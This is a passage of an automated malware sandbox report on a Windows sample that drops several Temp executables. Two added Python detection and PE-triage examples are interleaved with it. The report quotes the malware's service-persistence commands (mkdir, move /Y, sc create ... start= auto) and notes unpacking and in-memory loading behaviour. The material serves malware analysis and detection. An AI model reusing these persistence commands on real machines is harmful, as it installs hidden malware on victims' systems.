                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Process created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9460.exe C:\Users\user\AppData\Local\Temp\9460.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9779.exe C:\Users\user\AppData\Local\Temp\9779.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\A881.exe C:\Users\user\AppData\Local\Temp\A881.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Roaming\rcvfbte | Process created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Process created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Process created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Process created: unknown unknown
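The process tree above contains a complete service-persistence chain driven by A881.exe: cmd.exe creates a directory under SysWOW64 (mkdir), moves an executable dropped in the user's Temp folder into it (move /Y), and sc.exe registers that executable as an auto-start service whose arguments still point back at the Temp-resident dropper. The following Python is an added detection example, not part of the sandbox report or of the malware: it correlates process-creation records from the same parent and flags an `sc create` whose binPath was just staged. The record layout and the sample events are constructed to mirror the command lines listed above; real telemetry (Sysmon Event ID 1, EDR process events) would need its own field mapping.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class ProcEvent:
    """One process-creation record: parent image, child image, child command line."""
    parent: str
    image: str
    cmdline: str


# Constructed sample events mirroring the A881.exe -> cmd.exe / sc.exe chain in the report,
# plus one benign control record. Field layout is assumed, not a real telemetry schema.
SAMPLE_EVENTS = [
    ProcEvent('C:\\Users\\user\\AppData\\Local\\Temp\\A881.exe', 'C:\\Windows\\SysWOW64\\cmd.exe',
              '"C:\\Windows\\SysWOW64\\cmd.exe" /C mkdir C:\\Windows\\SysWOW64\\gebcmxiz\\'),
    ProcEvent('C:\\Users\\user\\AppData\\Local\\Temp\\A881.exe', 'C:\\Windows\\SysWOW64\\cmd.exe',
              '"C:\\Windows\\SysWOW64\\cmd.exe" /C move /Y "C:\\Users\\user\\AppData\\Local\\Temp\\lnagngtg.exe" '
              'C:\\Windows\\SysWOW64\\gebcmxiz\\'),
    ProcEvent('C:\\Users\\user\\AppData\\Local\\Temp\\A881.exe', 'C:\\Windows\\SysWOW64\\sc.exe',
              '"C:\\Windows\\SysWOW64\\sc.exe" create gebcmxiz binPath= "C:\\Windows\\SysWOW64\\gebcmxiz\\lnagngtg.exe '
              '/d\\"C:\\Users\\user\\AppData\\Local\\Temp\\A881.exe\\"" type= own start= auto DisplayName= "wifi support"'),
    # benign control: an administrator registering a vendor agent from Program Files
    ProcEvent('C:\\Windows\\System32\\cmd.exe', 'C:\\Windows\\System32\\sc.exe',
              'sc.exe create MyAgent binPath= "C:\\Program Files\\Vendor\\agent.exe" start= auto'),
]

SC_CREATE = re.compile(r'\bsc(?:\.exe)?"?\s+create\s+(?P<name>\S+)', re.I)
BINPATH = re.compile(r'binPath=\s*"?(?P<path>[A-Za-z]:\\[^"]+?\.exe)', re.I)
START_AUTO = re.compile(r'start=\s*auto', re.I)
MKDIR = re.compile(r'\bmkdir\s+"?(?P<dir>[A-Za-z]:\\[^"\s]+)', re.I)
MOVE = re.compile(r'\bmove\s+(?:/Y\s+)?"?(?P<src>[A-Za-z]:\\[^"]+?)"?\s+"?(?P<dst>[A-Za-z]:\\[^"\s]+)', re.I)
USER_WRITABLE = re.compile(r'\\Users\\[^\\]+\\AppData\\', re.I)


def _norm_dir(path: str) -> str:
    return path.rstrip('\\').lower()


def analyze(events: List[ProcEvent]) -> List[Dict]:
    """Correlate staging commands (mkdir / move) with a later `sc create` from the same parent."""
    staged: Dict[str, Set[str]] = {}   # parent image -> directories it created or moved files into
    findings = []
    for ev in events:
        cmd = ev.cmdline
        if m := MKDIR.search(cmd):
            staged.setdefault(ev.parent, set()).add(_norm_dir(m.group('dir')))
        if m := MOVE.search(cmd):
            staged.setdefault(ev.parent, set()).add(_norm_dir(m.group('dst')))
        sc = SC_CREATE.search(cmd)
        if not sc:
            continue
        bp = BINPATH.search(cmd)
        bin_path = bp.group('path') if bp else ''
        bin_dir = _norm_dir(bin_path.rsplit('\\', 1)[0]) if bin_path else ''
        reasons = []
        if USER_WRITABLE.search(ev.parent):
            reasons.append('sc.exe launched by a process running from a user-writable directory')
        if bin_dir and bin_dir in staged.get(ev.parent, set()):
            reasons.append('binPath directory was created/populated by the same parent just before')
        if USER_WRITABLE.search(cmd):
            reasons.append('service command line references a user-writable path')
        # start= auto on its own is normal; it only raises severity when something above fired
        if reasons and START_AUTO.search(cmd):
            reasons.append('start= auto: service starts at boot (persistence)')
        if reasons:
            findings.append({'service': sc.group('name'), 'binpath': bin_path,
                             'parent': ev.parent, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_EVENTS):
        print(f"[!] service {f['service']} -> {f['binpath']}")
        for r in f['reasons']:
            print('    -', r)
```

The correlation key is the parent image; in production you would key on parent process GUID and bound the lookback window, and you would also want the service-registry view (System event 7045 or the `HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath` write), since sc.exe is only one of several ways to reach CreateService.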
                      Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\9460.tmp
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 1_2_00419905 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:6868:64:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1244:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6608
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: 0.0
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: wapejan
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: wovag
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: cbH
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: Piruvora
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: gukafipa
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: Pusazide
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Command line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Command line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Command line argument: cbH
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 969F.exe.10.dr, Univesity_Grade_Calculator/Form1.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: ZA3cYU28Yl.exe | Static PE information: More than 200 imports for KERNEL32.dll
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: ZA3cYU28Yl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000015.00000003.395354648.0000000004A9A000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb) source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: $C:\sujabofu\kusaximenoki-xade\belowupo.pdbh source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: fltLib.pdb; source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: dC:\mezakidujawu dukopigowoyiy56\feno_coje.pdbh source: ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbq source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\sujabofu\kusaximenoki-xade\belowupo.pdb source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: C:\mezakidujawu dukopigowoyiy56\feno_coje.pdb source: ZA3cYU28Yl.exe, ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbk source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
                      Source: Binary string: cfgmgr32.pdb= source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp

                      Data Obfuscation:

                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Unpacked PE file: 22.2.9779.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Unpacked PE file: 26.2.A881.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Unpacked PE file: 22.2.9779.exe.400000.0.unpack .text:ER;.data:W;.zic:W;.wuvuhus:W;.jufot:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Unpacked PE file: 26.2.A881.exe.400000.0.unpack .text:ER;.data:W;.mekafe:W;.tuxu:W;.hawoz:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
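The two lines above are the sandbox's unpacking heuristic: the on-disk 9779.exe and A881.exe carry a .text section plus several writable sections with random names (.zic, .wuvuhus, .jufot and .mekafe, .tuxu, .hawoz), while the image dumped from memory after the stub ran has the conventional .text/.rdata/.data/.reloc layout of a normal MSVC build. The Python below is an added example, not code from the report: it parses IMAGE_SECTION_HEADER entries with struct, summarises each section's rights, diffs the disk layout against the memory layout, and applies the two triage checks an analyst does by hand (writable+executable sections, non-standard names). The section tables are constructed to match the names the report shows for 9779.exe; the characteristics values are assumed typical flags for such sections, not read from the sample, and the minimal PE stub is only a header skeleton, not a loadable file. Rights are printed as explicit E/R/W letters, so a writable data section appears as RW rather than the report's single W.

```python
import struct
from typing import Dict, List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = '<8sIIIIIIHHI'
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER)  # 40 bytes

CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
DATA_R = IMAGE_SCN_MEM_READ

# Constructed layouts using the section names the report lists for 9779.exe (disk vs. memory dump).
# Characteristics are assumed typical values, not extracted from the sample.
PACKED_9779 = [('.text', CODE), ('.data', DATA_RW), ('.zic', DATA_RW), ('.wuvuhus', DATA_RW),
               ('.jufot', DATA_RW), ('.rsrc', DATA_R), ('.reloc', DATA_R)]
UNPACKED_9779 = [('.text', CODE), ('.rdata', DATA_R), ('.data', DATA_RW), ('.reloc', DATA_R)]


def build_section_table(sections: List[Tuple[str, int]]) -> bytes:
    """Serialize (name, characteristics) pairs as raw section headers; sizes/offsets are placeholders."""
    blob, rva = b'', 0x1000
    for name, chars in sections:
        blob += struct.pack(SECTION_HEADER, name.encode('ascii').ljust(8, b'\0'),
                            0x1000, rva, 0x1000, rva, 0, 0, 0, 0, chars)
        rva += 0x1000
    return blob


def build_minimal_pe(sections: List[Tuple[str, int]]) -> bytes:
    """Constructed header skeleton: DOS header (e_lfanew=0x40), 'PE\\0\\0', IMAGE_FILE_HEADER,
    a zeroed 0xE0-byte optional header, then the section table. Parseable, not loadable."""
    dos = b'MZ' + b'\0' * 58 + struct.pack('<I', 0x40)
    file_hdr = struct.pack('<HHIIIHH', 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    return dos + b'PE\0\0' + file_hdr + b'\0' * 0xE0 + build_section_table(sections)


def locate_section_table(pe: bytes) -> Tuple[int, int]:
    """Return (file offset, NumberOfSections) of the section table in a raw PE image."""
    if pe[:2] != b'MZ':
        raise ValueError('not an MZ image')
    e_lfanew = struct.unpack_from('<I', pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('bad PE signature')
    count = struct.unpack_from('<H', pe, e_lfanew + 6)[0]       # FileHeader.NumberOfSections
    opt_size = struct.unpack_from('<H', pe, e_lfanew + 20)[0]   # FileHeader.SizeOfOptionalHeader
    return e_lfanew + 24 + opt_size, count


def parse_section_table(data: bytes, offset: int, count: int) -> List[Dict]:
    out = []
    for i in range(count):
        fields = struct.unpack_from(SECTION_HEADER, data, offset + i * SECTION_HEADER_SIZE)
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = fields
        out.append({'name': name.rstrip(b'\0').decode('ascii', 'replace'), 'va': va,
                    'vsize': vsize, 'rawsize': rawsize, 'rawptr': rawptr, 'chars': chars})
    return out


def rights(chars: int) -> str:
    """E if executable or flagged as code, R if readable, W if writable."""
    masks = (('E', IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE),
             ('R', IMAGE_SCN_MEM_READ), ('W', IMAGE_SCN_MEM_WRITE))
    return ''.join(flag for flag, mask in masks if chars & mask)


def layout(sections: List[Dict]) -> str:
    return ';'.join(f"{s['name']}:{rights(s['chars'])}" for s in sections)


def diff_layouts(before: List[Dict], after: List[Dict]) -> List[str]:
    """Sections added, removed, or with changed rights between two images (disk vs. memory dump)."""
    b = {s['name']: rights(s['chars']) for s in before}
    a = {s['name']: rights(s['chars']) for s in after}
    changes = [f'removed {n}:{b[n]}' for n in b.keys() - a.keys()]
    changes += [f'added {n}:{a[n]}' for n in a.keys() - b.keys()]
    changes += [f'{n}: {b[n]} -> {a[n]}' for n in a.keys() & b.keys() if a[n] != b[n]]
    return sorted(changes)


STANDARD_NAMES = {'.text', '.rdata', '.data', '.rsrc', '.reloc', '.idata', '.edata',
                  '.pdata', '.tls', '.bss', '.CRT'}


def suspicious(sections: List[Dict]) -> List[str]:
    """Triage checks: writable+executable sections and non-standard section names."""
    notes = []
    for s in sections:
        r = rights(s['chars'])
        if 'W' in r and 'E' in r:
            notes.append(f"{s['name']} is writable and executable")
        if s['name'] not in STANDARD_NAMES:
            notes.append(f"{s['name']} has a non-standard name ({r})")
    return notes


def summarize(pe: bytes) -> List[Dict]:
    off, n = locate_section_table(pe)
    return parse_section_table(pe, off, n)


if __name__ == '__main__':
    packed = summarize(build_minimal_pe(PACKED_9779))
    unpacked = summarize(build_minimal_pe(UNPACKED_9779))
    print('disk   :', layout(packed))
    print('memory :', layout(unpacked))
    print('changes:', diff_layouts(packed, unpacked))
    print('triage :', suspicious(packed))
```

On a real file, `summarize(open(path, 'rb').read())` gives the disk view; for the memory view, dump the image from the debugger or sandbox at the new entry point and feed the dump through the same function. A memory dump whose section rights are all RWX, or whose .text has grown, is the same signal the report's "changes PE section rights" heuristic is keyed on.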
                      .NET source code contains potential unpacker
                      Source: 3657.exe.10.dr, CoreApi.cs | .Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 969F.exe.10.dr, Univesity_Grade_Calculator/Form1.cs | .Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
